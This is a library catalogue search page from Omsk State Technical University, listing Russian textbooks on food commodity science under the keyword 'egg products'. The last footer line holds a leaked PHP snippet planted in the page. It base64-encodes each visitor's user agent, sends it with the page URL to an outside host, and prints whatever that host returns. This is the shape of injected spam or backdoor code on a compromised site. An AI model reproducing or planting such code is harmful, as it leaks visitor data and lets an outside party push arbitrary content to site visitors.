Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

47 пользователей


Зарегистрированных: 1 

Скудин Иван Борисович


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ЯЙЦЕПРОДУКТЫ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 42
1. 
Барановский В. А. Кондитер [Текст] : Учеб. пособие для уч-ся проф. лицеев и училищ / В. А. Барановский, Т. И. Перетятко, 2003. - 381 с.
Держатели документа (Информация об экземплярах) 
2. 
Отосина В. Н. Практические работы по товароведению продовольственных товаров [Текст] : [Учеб. пособие] / В. Н. Отосина, 2003. - 284 с.
Держатели документа (Информация об экземплярах) 
3. 
Матюхина З. П. Товароведение пищевых продуктов [Текст] : Учеб. пособие для учрежд. нач. проф. образования / З. П. Матюхина, Э. П. Королькова, 2000. - 271 с.
Держатели документа (Информация об экземплярах) 
4. 
Товароведение и организация торговли продовольственными товарами [Текст] : Учеб. для учреждений нач. проф. образования / А. М. Новикова, Т. С. Голубкина, Н. С. Никифорова, С. А. Прокофьева, 2001. - 472 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ зерномучных ТОВАРОВ -- ТОВАРОВЕДЕНИЕ плодоовощных ТОВАРОВ -- ТОВАРОВЕДЕНИЕ вкусовых товаров -- ТОВАРОВЕДЕНИЕ кондитерских товаров -- ТОВАРОВЕДЕНИЕ молочных товаров -- ЯЙЦЕПРОДУКТЫ -- ЖИР ПИЩЕВОЙ -- ТОВАРОВЕДЕНИЕ мясных продуктов -- ТОВАРОВЕДЕНИЕ рыбных продуктов -- ТОРГОВЛЯ РОЗНИЧНАЯ -- СПРОС ПОКУПАТЕЛЬСКИЙ -- ТАРА -- МАГАЗИН -- ПРИЕМКА ТОВАРОВ -- ХРАНЕНИЕ ТОВАРА -- Выкладка товара -- ПРОДАЖА ТОВАРА -- УПАКОВКА товара -- ШТРИХОВОЕ КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА -- КРУПА -- МУКА -- ХЛЕБ -- ДРОЖЖИ -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ОВОЩИ -- Плоды -- Грибы -- ЧАЙ -- КОФЕ -- НАПИТОК АЛКОГОЛЬНЫЙ -- Напиток слабоалкогольный -- КРАХМАЛ -- Сахар -- Мед -- Молоко -- Мороженое -- Сыр -- МЯСО -- Рыба
Держатели документа (Информация об экземплярах) 
5. 
Барановский В. А. Продавец [Текст] : Учеб. пособие для уч-ся учеб. заведений нач. проф. образования / В. А. Барановский, Л. И. Рубцова, В. А. Тимофеева, 2003. - 447 с.
Ключевые слова 
ПРОДАВЕЦ -- ТОВАРОДВИЖЕНИЕ -- СЕТЬ ТОРГОВАЯ РОЗНИЧНАЯ -- ТОРГОВЛЯ РОЗНИЧНАЯ -- КООПЕРАЦИЯ ПОТРЕБИТЕЛЬСКАЯ -- МАГАЗИН - Планировка -- ЗАЛ ТОРГОВЫЙ -- ОБОРУДОВАНИЕ ТОРГОВОЕ -- ИНВЕНТАРЬ ТОРГОВЫЙ -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- ОБОРУДОВАНИЕ ПОДЪЕМНО - ТРАН -- АППАРАТ контрольно-кассовый -- ОБОРУДОВАНИЕ ХОЛОДИЛЬНОЕ -- ОБОРУДОВАНИЕ ВЕСОИЗМЕРИТЕЛЬН -- АССОРТИМЕНТ ТОВАРНЫЙ -- СПРОС ПОКУПАТЕЛЬСКИЙ -- ТАРА -- ТОВАРООБОРОТ -- ПРИЕМКА ТОВАРОВ -- РАБОЧЕЕ МЕСТО продавца -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ТОВАРЫ МОЛОЧНЫЕ -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- РЫБА -- ТОВАРЫ ВКУСОВЫЕ -- ЧАЙ -- КОФЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- ТАБАК - ТОРГОВЛЯ -- ПРЯНОСТИ -- ПРИПРАВА -- НАПИТОК АЛКОГОЛЬНЫЙ -- ЖИР ПИЩЕВОЙ -- МАСЛО РАСТИТЕЛЬНОЕ -- МАРГАРИН -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ТОВАРЫ текстильные -- ТОВАРЫ швейные -- ТОВАРЫ ТРИКОТАЖНЫЕ -- ТОВАРЫ ОБУВНЫЕ -- ТОВАРЫ ГАЛАНТЕРЕЙНЫЕ -- ТОВАРЫ ПАРФЮМЕРНО-КОСМЕТИЧЕС -- КУЛЬТТОВАРЫ -- ТОВАРЫ СТЕКЛЯННЫЕ -- ТОВАРЫ КЕРАМИЧЕСКИЕ -- ТОВАРЫ МЕТАЛЛОХОЗЯЙСТВЕННЫЕ
Держатели документа (Информация об экземплярах) 
6. 
Тимофеева В. А. Товароведение продовольственных товаров [Текст] : учеб. пособие для студ. образоват. учреждений сред. проф. образования / В. А. Тимофеева, 2003. - 447 с.
Держатели документа (Информация об экземплярах) 
7. 
Технологии пищевых производств [Текст] : учеб. для студентов высш. учеб. заведений / под общ. ред. А. П. Нечаева, 2005. - 767 с.
Ключевые слова 
ПИТАНИЕ - ЗДОРОВЬЕ -- ПИТАНИЕ НАСЕЛЕНИЯ -- ПРОДУКТЫ ПИЩЕВЫЕ -- БЕЛКИ - ПИТАНИЕ -- ЛИПИДЫ - ПИТАНИЕ -- УГЛЕВОДЫ - ПИТАНИЕ -- ВИТАМИНЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАН -- ВОДА - ПИТАНИЕ -- ПРОИЗВОДСТВО ПИЩЕВОЕ -- СТАНДАРТИЗАЦИЯ ПРОДУКЦИИ ПИЩ -- СЕРТИФИКАЦИЯ ПИЩЕВЫХ ПРОДУКТ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- СЫРЬЕ ПИЩЕВОЕ -- ЗЕРНО - ПРОИЗВОДСТВО -- солод -- КРАХМАЛ - ПРОИЗВОДСТВО -- САХАР - ПРОИЗВОДСТВО -- МУКА ПШЕНИЧНАЯ - ГОСТ -- МОЛОКО - производство -- ЯЙЦЕПРОДУКТЫ -- ДОБАВКА ПИЩЕВАЯ -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- БАД -- ПРОБИОТИКИ -- ТЕХНОЛОГИЯ ПРОДУКЦИИ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- МАСЛО РАСТИТЕЛЬНОЕ -- ЖИРЫ - производство -- ПИВО - производство -- КВАС -- ДРОЖЖИ - производство -- кислота лимонная -- УКСУС -- КИСЛОТА молочная -- КОНЬЯК - производство -- ВИНОДЕЛИЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- КОНСЕРВЫ ОВОЩНЫЕ - ПРОИЗВОДС -- КОНСЕРВЫ ПЛОДООВОЩНЫЕ -- ЧАЙ - производство
Держатели документа (Информация об экземплярах) 
8. 
Дубцов Г. Г. Товароведение пищевых продуктов [Текст] : учеб. для студ. образоват. учрежд. сред. проф. образования / Г. Г. Дубцов, 2002. - 264 с.
Держатели документа (Информация об экземплярах) 
9. 
Химический состав российских пищевых продуктов [Текст] : Справ. / под ред. И. М. Скурихина, В. А. Тутельяна, 2002. - 235 с.
Держатели документа (Информация об экземплярах) 
10. 
Дубцов Г. Г. Товароведение пищевых продуктов [Текст] : Учеб. для студ. образоват. учрежд. сред. проф. образования / Г. Г. Дубцов, 2001. - 264 с.
Держатели документа (Информация об экземплярах) 
11. 
Тимофеева В. А. Товароведение продовольственных товаров [Текст] : Учеб. пособие для студ. сред. проф.образования / В. А. Тимофеева, 2001. - 443 с.
Держатели документа (Информация об экземплярах) 
12. 
Тимофеева, Валентина Афанасьевна. Товароведение продовольственных товаров [Текст] : Учеб. пособие для образоват. учреждений сред. и проф. образования по специальности 0612 "Товароведение" / В. А. Тимофеева, 2002. - 447 с.
Ключевые слова 
ПРОДОВОЛЬСТВЕННЫЕ ТОВАРЫ -- КОНДИТЕРСКИЕ ТОВАРЫ -- МОЛОЧНЫЕ ТОВАРЫ -- ПИЩЕВЫЕ ЖИРЫ -- МЯСНЫЕ ПРОДУКТЫ -- ЯИЧНЫЕ ТОВАРЫ -- РЫБНЫЕ ТОВАРЫ -- ВКУСОВЫЕ ТОВАРЫ -- ПЛОДООВОЩЫЕ ТОВАРЫ -- ЗЕРНО -- ПИЩЕВЫЕ КОНЦЕНТРАТЫ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК чайный -- ПРЯНОСТИ -- ТАБАК -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- Крахмал -- Сахар -- Мед -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- МОЛОКО -- Мороженое -- СЫР -- ЖИР пищевой -- Масло растительное -- Маргарин -- Жир кулинарный -- МЯСО -- ЯЙЦЕПРОДУКТЫ -- Концентрат пищевой -- РЫБА

В книге рассматриваются основные вопросы товароведения продовольственных товаров в современных условиях; приведены необходимые <продавцу> и <товароведу> сведения по всем группам <товаров>, а также по вопросам <стандартизации> и <сертификации>, информационному обеспечению, которые позволят работникам торговли принимать квалифицированные решения в <коммерческой деятельности>.

13. 
Кругляков, Геннадий Николаевич. Товароведение продовольственных товаров [Текст] : Учеб. / Г. Н. Кругляков, Г. В. Круглякова, 2000. - 447 с.
14. 
Товароведение продовольственных товаров [Текст] : Конспект лекций / М. Бурова, 2000. - 142 с.
15. 
Коснырева, Людмила Михайловна. Товароведение и экспертиза мяса и мясных товаров [Текст] : Учебник гриф-УМО / Л. М. Коснырева, В. И. Криштафович, В. М. Позняковский, 2005. - 320 с.
Держатели документа (Информация об экземплярах) 
16. 
Справочник по товароведению продовольственных товаров [Текст] : Справочники/словари / Под ред. Т.Г.Родиной, 2003. - 608 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ -- Товары продовольственные -- ЦЕННОСТЬ ПИЩИ ЭНЕРГЕТИЧЕСКАЯ -- ЦЕННОСТЬ ПИЩИ биологическая -- ЦЕННОСТЬ ПИЩИ физиологическая -- ЦЕННОСТЬ ПИЩИ органолептическая -- Усвояемость пищи -- КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА ТОВАРА -- ИНФОРМАЦИЯ О ТОВАРЕ -- БЕЗОПАСНОСТЬ пищевых продуктов -- Безопасность эпидемиологическая -- ТАРА -- УПАКОВКА -- УТИЛИЗАЦИЯ тары -- ДОБАВКА ПИЩЕВАЯ -- Краситель пищевой -- Консервант -- Антиокислитель -- Ароматизатор -- Препарат коптильный -- ТОВАРЫ зерномучные -- Зерно -- Мука -- Крупа -- МАКАРОНЫ -- Хлеб -- СУХАРИ -- ПЛОДЫ -- ОВОЩИ -- ГРИБЫ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- РЕЗИНКА ЖЕВАТЕЛЬНАЯ -- Карамель -- Шоколад -- КАКАО - порошок -- Конфеты -- Ирис -- Драже -- Халва -- Печенье -- ВАФЛИ -- ПИРОЖНЫЕ -- ТОРТЫ -- РУЛЕТ -- КЕКС -- Сладости восточные -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПРОДУКТЫ детского питания -- ТОВАРЫ вкусовые -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- Сметана -- Сыр -- ТОВАРЫ молочные -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 
17. 
Матюхина З. П. Товароведение пищевых продуктов [Текст] : Учеб. пособие для учрежд. нач. проф. образования / З. П. Матюхина, Э. П. Королькова, 2001. - 271 с.
Держатели документа (Информация об экземплярах) 
18. 
Чепурной, И. П. Идентификация и фальсификация продовольственных товаров [Текст] : учебник / И. П. Чепурной, 2002. - 460 с.
Держатели документа (Информация об экземплярах) 
19. 
Товароведение продовольственных товаров [Текст] : Уч.пособие / Л. А. Боровикова, В. А. Герасимова, А. М. Евдокимов, 1988. - 352 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ТОВАРОВЕДЕНИЕ - ТЕОРИЯ -- СОСТАВ ХИМИЧЕСКИЙ ПРОДУКТОВ -- ПОЛЕЗНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- СТАНДАРТИЗАЦИЯ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- КЛАССИФИКАЦИЯ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ХРАНЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ТАРА -- МАТЕРИАЛ УПАКОВОЧНЫЙ -- КОНСЕРВИРОВАНИЕ ПРОДТОВАРОВ -- ПОТЕРИ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- МИКРОБИОЛОГИЯ ПИЩЕВЫХ ПРОДУКТОВ -- ТОВАРЫ ЗЕРНОМУЧНЫЕ -- ОВОЩИ -- ПЛОДЫ -- ГРИБЫ -- ТОВАРЫ ВКУСОВЫЕ -- КРАХМАЛ -- САХАР -- МЕД -- ТОВАРЫ КОНДИТЕРСКИЕ -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- ТОВАРЫ МОЛОЧНЫЕ -- МЯСО -- ТОВАРЫ РЫБНЫЕ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- РЫБА -- ТОВАРЫ РЫБНЫЕ -- ИКРА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 
20. 
Матюхина, Зинаида Петровна. Товароведение пищевых продуктов [Текст] : Учеб. для учеб. заведений нач. проф. образования / З. П. Матюхина, Э. П. Королькова, 1999. - 272 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3025 - 21.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.75 с.12 запросов, 0.45c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;